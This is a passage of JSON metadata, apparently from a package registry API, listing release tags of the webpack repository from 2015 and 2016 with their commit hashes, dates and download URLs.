tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.